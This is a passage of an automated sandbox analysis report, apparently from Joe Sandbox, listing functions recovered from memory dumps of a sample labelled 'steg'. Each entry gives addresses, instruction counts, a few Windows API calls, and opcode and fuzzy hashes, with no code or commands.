                                                                                                                    Function 05B10A7F Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 123 5b10a7f-5b10ad9 125 5b10b06-5b10b0b 123->125 126 5b10adb-5b10aee PostMessageW 123->126 125->126 127 5b10af0-5b10b03 126->127 128 5b10b0d-5b10b12 126->128 128->127
                                                                                                                    APIs
                                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 05B10AE1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283448526.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_5b10000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 410705778-0
                                                                                                                    • Opcode ID: 7f134507ec340710ddd49b6556c4ed784927f4a2a89df2f1ec8dbc4c15cb6df7
                                                                                                                    • Instruction ID: 375d4aeb95a077d3ece9d5c272671e31f920fb2a9c60277c86822ca95419aa94
                                                                                                                    • Opcode Fuzzy Hash: 7f134507ec340710ddd49b6556c4ed784927f4a2a89df2f1ec8dbc4c15cb6df7
                                                                                                                    • Instruction Fuzzy Hash: 0F119131409384AFD7228F25CC84A62FFB4EF06320F0984DEED858B163D275A858CB62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05B10356 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 131 5b10356-5b1037a 132 5b1037c 131->132 133 5b1037f-5b10388 131->133 132->133 134 5b1038a 133->134 135 5b1038d-5b10399 133->135 134->135 136 5b103d3-5b103d8 135->136 137 5b1039b-5b103a3 GetTextExtentPoint32W 135->137 136->137 138 5b103a9-5b103bb 137->138 140 5b103da-5b103df 138->140 141 5b103bd-5b103d0 138->141 140->141
                                                                                                                    APIs
                                                                                                                    • GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 05B103A1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283448526.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_5b10000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExtentPoint32Text
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 223599850-0
                                                                                                                    • Opcode ID: 2aaa271e041c6414e8b5350231d5c086c4ac78aebb068bb9d779baa593d77d82
                                                                                                                    • Instruction ID: 1ef08f7702c761e44e5fc6ab05b1bf24301b7803c3bccabfcb3f7debd4a06559
                                                                                                                    • Opcode Fuzzy Hash: 2aaa271e041c6414e8b5350231d5c086c4ac78aebb068bb9d779baa593d77d82
                                                                                                                    • Instruction Fuzzy Hash: 03118E715042449FDB60DF25E888B66FBE8FF08320F48C4EADD498B212D2B1E448CBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05B118AE Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 143 5b118ae-5b118e1 144 5b118e3-5b118f6 PostMessageW 143->144 145 5b11917-5b1191c 143->145 146 5b118f8-5b11914 144->146 147 5b1191e-5b11923 144->147 145->144 147->146
                                                                                                                    APIs
                                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 05B118E9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283448526.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_5b10000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 410705778-0
                                                                                                                    • Opcode ID: d4c8205b92ffd6fb15da5119dcbea208f5eec17fab6f8ad3fca3f3f2702feaaf
                                                                                                                    • Instruction ID: ad532b9ee2e77485ec17cbdcf0bd451deafdf745913285ef2fab18ed10947a6c
                                                                                                                    • Opcode Fuzzy Hash: d4c8205b92ffd6fb15da5119dcbea208f5eec17fab6f8ad3fca3f3f2702feaaf
                                                                                                                    • Instruction Fuzzy Hash: 8A01BC32500740DFDB218F59D884B66FBA0EF04320F08C0AEDE8A4B662D672E459CF62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05B10AA6 Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 150 5b10aa6-5b10ad9 151 5b10b06-5b10b0b 150->151 152 5b10adb-5b10aee PostMessageW 150->152 151->152 153 5b10af0-5b10b03 152->153 154 5b10b0d-5b10b12 152->154 154->153
                                                                                                                    APIs
                                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 05B10AE1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283448526.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_5b10000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 410705778-0
                                                                                                                    • Opcode ID: 8658e3eac42072e0d3750f5e13be47bbc24a424ed1d7011a8709782cee947c5d
                                                                                                                    • Instruction ID: 589329facd841debb9ec9eac6b16fa2a00d7acb656b823ef6f41a5fee7e090ae
                                                                                                                    • Opcode Fuzzy Hash: 8658e3eac42072e0d3750f5e13be47bbc24a424ed1d7011a8709782cee947c5d
                                                                                                                    • Instruction Fuzzy Hash: AF0178354406449FDB209F15D888B66FBA0EF08320F18C4DADE894A266D2B6A458CFA2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03370D20 Relevance: .3, Instructions: 308COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 46e01ec7276e180af2a376ddfe7026652629984a550294ff06449c218f15c6e1
                                                                                                                    • Instruction ID: 3aae8d1070a56c8eb8a0582ebc657736e3e401008137407bf2a56aa15828a374
                                                                                                                    • Opcode Fuzzy Hash: 46e01ec7276e180af2a376ddfe7026652629984a550294ff06449c218f15c6e1
                                                                                                                    • Instruction Fuzzy Hash: 23F1B434A01209DFCB14DFA8D494DEDBBB2FF84308F2495A8E8056B265DB756E47CB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03370D30 Relevance: .3, Instructions: 298COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4825ce6c26d14cc8e00d0125b2e97595928ee4663983c8271ae037c625c45fd2
                                                                                                                    • Instruction ID: 759f17a49a2c5953a4e8d8a9eb609a7ab80b91ee5fa57572cf010e73107b2985
                                                                                                                    • Opcode Fuzzy Hash: 4825ce6c26d14cc8e00d0125b2e97595928ee4663983c8271ae037c625c45fd2
                                                                                                                    • Instruction Fuzzy Hash: 2EE19234A01209DFCB14DFA8D494DEDBBB2FB84308F6495A8E8056B364DB756E47CB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03370898 Relevance: .2, Instructions: 204COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0218ecaf6777c0f5951045cfea0c47d3c5836777a0e7e3d22f086b001fb29744
                                                                                                                    • Instruction ID: 399f8b873b3187cc49a5b0d5fe81e42982e00a645eb59bc1468e3d7d92201574
                                                                                                                    • Opcode Fuzzy Hash: 0218ecaf6777c0f5951045cfea0c47d3c5836777a0e7e3d22f086b001fb29744
                                                                                                                    • Instruction Fuzzy Hash: 8291D074E01219CFDB28DFA9C894BADBBF2BF49310F1481A9D409AB3A0DB755985CF50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03371528 Relevance: .2, Instructions: 180COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3a79396027a53e374cde92175dced92810cb1e0f07fdcfb7c45ba0eabc175079
                                                                                                                    • Instruction ID: 34083f15763b9c8e3fd1145a792c0f87b73ab035492ea16f0cc3ce2e671bbc06
                                                                                                                    • Opcode Fuzzy Hash: 3a79396027a53e374cde92175dced92810cb1e0f07fdcfb7c45ba0eabc175079
                                                                                                                    • Instruction Fuzzy Hash: 24711575D01209DFCB68DFB9D580A9DBBF2EF8A311F2091AAD405A7364DB349942CF50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03370887 Relevance: .2, Instructions: 180COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8a7089ca5c0bac2ad8d1387eafbbd6442e63f09961c7d33b923c138c7e88ed5c
                                                                                                                    • Instruction ID: 17a2c38f1c704aeaa0e4363d5cb3868c3b3ba1fd56c4cb75db04b38ea0a93ff8
                                                                                                                    • Opcode Fuzzy Hash: 8a7089ca5c0bac2ad8d1387eafbbd6442e63f09961c7d33b923c138c7e88ed5c
                                                                                                                    • Instruction Fuzzy Hash: 4471F470E01219CFDB68DFA9C894BADBBF2BF49310F1481A9D409AB3A0DB745985CF50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03371A88 Relevance: .1, Instructions: 147COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 18031f251a8f959ad53ad429e9bd9fc8010bef4d8564a7b57d84e6cc604de8a3
                                                                                                                    • Instruction ID: ab3bcd1b2b489d6e648d81fe3801524f4c4d2765abd98d2fa0f3e9f0f1715e8b
                                                                                                                    • Opcode Fuzzy Hash: 18031f251a8f959ad53ad429e9bd9fc8010bef4d8564a7b57d84e6cc604de8a3
                                                                                                                    • Instruction Fuzzy Hash: 52512B31E01208DFCB29DFB8C8919EEBBB6FF8A305F5094A9D40167290CB35A941CF54
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 033702C0 Relevance: .1, Instructions: 128COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4f08786eaae5a54e02e6c5a9cb5ae09c861e20924e5a57b7c565d4f960662155
                                                                                                                    • Instruction ID: bfa33ce20d440e0b85438271fc6ba734a1bfa1988e7240f03daae406c0cce66f
                                                                                                                    • Opcode Fuzzy Hash: 4f08786eaae5a54e02e6c5a9cb5ae09c861e20924e5a57b7c565d4f960662155
                                                                                                                    • Instruction Fuzzy Hash: 0F51E1B9A04308DFDF14CFA8C980A9DBBF1FB0D310F145499E506AB3A1D679A941DF20
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 033702D0 Relevance: .1, Instructions: 117COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d1c777e3490b119973bf2d0ac9b922f0e349d654faef8dd45df01ba0595e339c
                                                                                                                    • Instruction ID: 395760bb53f0fe04acf4055d08041c72383b2b630ffec40f081995077b70e1ab
                                                                                                                    • Opcode Fuzzy Hash: d1c777e3490b119973bf2d0ac9b922f0e349d654faef8dd45df01ba0595e339c
                                                                                                                    • Instruction Fuzzy Hash: 38419EB8A00208DFDF14DFA8C880AADBBF5FB0D310F145495E906AB361D679A940DF64
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03371B19 Relevance: .1, Instructions: 112COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6dab7e7516b97ca17eca2e6f15514a48fea3fed84091fe2cacf9bd076e4c2e35
                                                                                                                    • Instruction ID: b30ba792c97bfe01713c0d0f096a32fe6d235536dd299b6977b2463a1102f2ce
                                                                                                                    • Opcode Fuzzy Hash: 6dab7e7516b97ca17eca2e6f15514a48fea3fed84091fe2cacf9bd076e4c2e35
                                                                                                                    • Instruction Fuzzy Hash: 17411A31E42208CFCB19DBB4D8619DEB772EF8A315F509469E401372A0CB36A845CF58
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03371B28 Relevance: .1, Instructions: 107COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 029b017000843fbe538278a6a98eaee7ed970ec3a3f57d6ea20b0f42a8ef2712
                                                                                                                    • Instruction ID: 3889c20c97c3dd317e66ec8ac3e45ae821073801036b49e9c8898ffcfdb23777
                                                                                                                    • Opcode Fuzzy Hash: 029b017000843fbe538278a6a98eaee7ed970ec3a3f57d6ea20b0f42a8ef2712
                                                                                                                    • Instruction Fuzzy Hash: AE31F831E42208DFCB19DBB4D8619DEB772FF8A315F509469E40137290CB36A885DF68
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03373D08 Relevance: .1, Instructions: 72COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 459f8bb3c4f689cb69240c461e8648bbd398054addda9b28b71da76dcb71c4f5
                                                                                                                    • Instruction ID: 6d07851ef9b52daa298b204358cc27c144190e9cbd441016a090045077182983
                                                                                                                    • Opcode Fuzzy Hash: 459f8bb3c4f689cb69240c461e8648bbd398054addda9b28b71da76dcb71c4f5
                                                                                                                    • Instruction Fuzzy Hash: 19218074D052499FCB21DFA4D894AEDBFF4AF0B320F1890AAD400B7252D7389944EFA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03370148 Relevance: .1, Instructions: 62COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1b518a2eaf009174b3cf119e283dff52d3708d86d6db21787adb6a7238ff01a2
                                                                                                                    • Instruction ID: 5f80ee19b598f78a03c3ecf821a87fb419ab543e5dfd46ff38585642cc58abd6
                                                                                                                    • Opcode Fuzzy Hash: 1b518a2eaf009174b3cf119e283dff52d3708d86d6db21787adb6a7238ff01a2
                                                                                                                    • Instruction Fuzzy Hash: C921D47090534ACFCB15EFA8EC908AD7B76FF82205B10669AD910AB265DB719E02CB45
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 033714D7 Relevance: .1, Instructions: 52COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ab9cf2b1e4ce9ac154c18c74e8bbbb20f5b2fccda09f5b9d3fb646f27f75135f
                                                                                                                    • Instruction ID: 9b2b410fa0d79bd6ec9ce2e331dbe3f63d9204bca1ca1454a77348f0e17625f2
                                                                                                                    • Opcode Fuzzy Hash: ab9cf2b1e4ce9ac154c18c74e8bbbb20f5b2fccda09f5b9d3fb646f27f75135f
                                                                                                                    • Instruction Fuzzy Hash: 62018034D01108EFCB28DFB8D9919ADBBB6FB82255F242199C40A67290DB315E86DB49
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03370158 Relevance: .1, Instructions: 51COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2d165823490fb7446b0cf0c1926220228a541877dbd48cff111c22fa34c9bf0a
                                                                                                                    • Instruction ID: 102d1636fe415b7226c4c750d98dde83d741c66e13986f75a8b97dbb2e7675ed
                                                                                                                    • Opcode Fuzzy Hash: 2d165823490fb7446b0cf0c1926220228a541877dbd48cff111c22fa34c9bf0a
                                                                                                                    • Instruction Fuzzy Hash: 86112E7090120ADBCB14EFA8EC549ADB7BAFB81305B10526D981167254EF719E42CB96
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03370439 Relevance: .0, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 338fc5b524e58a45d8722b843db6c2ac3b7ef88b4ac79ab7b7828537c5c66cf8
                                                                                                                    • Instruction ID: f8851f8d0c95573799cfd6a82536ba095f4ad9e75fd15bb51a9eb3054e9b4ba1
                                                                                                                    • Opcode Fuzzy Hash: 338fc5b524e58a45d8722b843db6c2ac3b7ef88b4ac79ab7b7828537c5c66cf8
                                                                                                                    • Instruction Fuzzy Hash: DB012130942304DFCB29DFB0C954AAA7776EF87305F2458EED00527290CB769E81EB14
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03370448 Relevance: .0, Instructions: 40COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 92e2ca8ace71bc2728e87e94dc93cf0c967e0e422d4accdf61e7bad50bb8b5a8
                                                                                                                    • Instruction ID: 60ee0bb2c71136f5d56f818922604a7d966e6bdb6e3979a4d0a9b48161be7bb2
                                                                                                                    • Opcode Fuzzy Hash: 92e2ca8ace71bc2728e87e94dc93cf0c967e0e422d4accdf61e7bad50bb8b5a8
                                                                                                                    • Instruction Fuzzy Hash: F0F0F430942208DFCB28DFB0C950AAEB376EF87305F2458AD900527354CF769E91EA54
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 033700B1 Relevance: .0, Instructions: 39COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 76079ba3205887e9366164aba4da17c1458af2df7031d65510d6f65747e6f3f3
                                                                                                                    • Instruction ID: 4cf995f2afd61009a9aa0d8d827fa0894bfa83a3512e243541b90678fbb90a8a
                                                                                                                    • Opcode Fuzzy Hash: 76079ba3205887e9366164aba4da17c1458af2df7031d65510d6f65747e6f3f3
                                                                                                                    • Instruction Fuzzy Hash: 0CF02D30C002099FCB29DFB4C8953FEBFF5AB0A224F14686AD010B3281D63956408BE0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0337081F Relevance: .0, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 965dd9d749bce2351ea1fb4761d2eb338e36b1dc701defce484470927bffd04b
                                                                                                                    • Instruction ID: 1e69593497cf26ebd90a41ff3f2d28b31d0b33347e6dd0fe95dd52a5a47bd6d1
                                                                                                                    • Opcode Fuzzy Hash: 965dd9d749bce2351ea1fb4761d2eb338e36b1dc701defce484470927bffd04b
                                                                                                                    • Instruction Fuzzy Hash: 43014B34A04249AFCB01CFA8DA84899BFF4FB19204B2582D6D818DB765D734AE02CF80
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03370737 Relevance: .0, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 48b6eb1e865072e8557ed3dccdf7289bcea772979f3790aaa78353ada665387e
                                                                                                                    • Instruction ID: d9e4550fa33f35fbff4ebcc8d2bc9404810eee0f9e23b8ea8d4c82a193aed56c
                                                                                                                    • Opcode Fuzzy Hash: 48b6eb1e865072e8557ed3dccdf7289bcea772979f3790aaa78353ada665387e
                                                                                                                    • Instruction Fuzzy Hash: BFF06D39D05349DFCB16CFB4C58409CBFB5FF4A215B6049DAD814AB652C73A9A06CF44
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03370270 Relevance: .0, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 702de79baa0a0749e5568145ae2c28b4aded6e1918ce8352f0eeb39e10df12fd
                                                                                                                    • Instruction ID: 0da6ce9d9fed7fc1cc08287039e1fb4e75f2f90bd57ba987da3423e0d74bd089
                                                                                                                    • Opcode Fuzzy Hash: 702de79baa0a0749e5568145ae2c28b4aded6e1918ce8352f0eeb39e10df12fd
                                                                                                                    • Instruction Fuzzy Hash: 23F0307590D385AFCB16CFB4D990498BFB5EE5321071850DBC444DB253E6794E45CB11
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 033700C0 Relevance: .0, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d32e5be2e767c1008f5e0ef18b01dcc8a52d56460f9a6685bf0e0d1a304fa497
                                                                                                                    • Instruction ID: e63f6a60e922f463732d554765e0fa0a1c9be40d3b0da347cccc94e1830d383e
                                                                                                                    • Opcode Fuzzy Hash: d32e5be2e767c1008f5e0ef18b01dcc8a52d56460f9a6685bf0e0d1a304fa497
                                                                                                                    • Instruction Fuzzy Hash: 49F08270D1120D9FDB68DFA5C8957FFFAF59B49310F10582AD000B3280DA7459548BE5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03370830 Relevance: .0, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
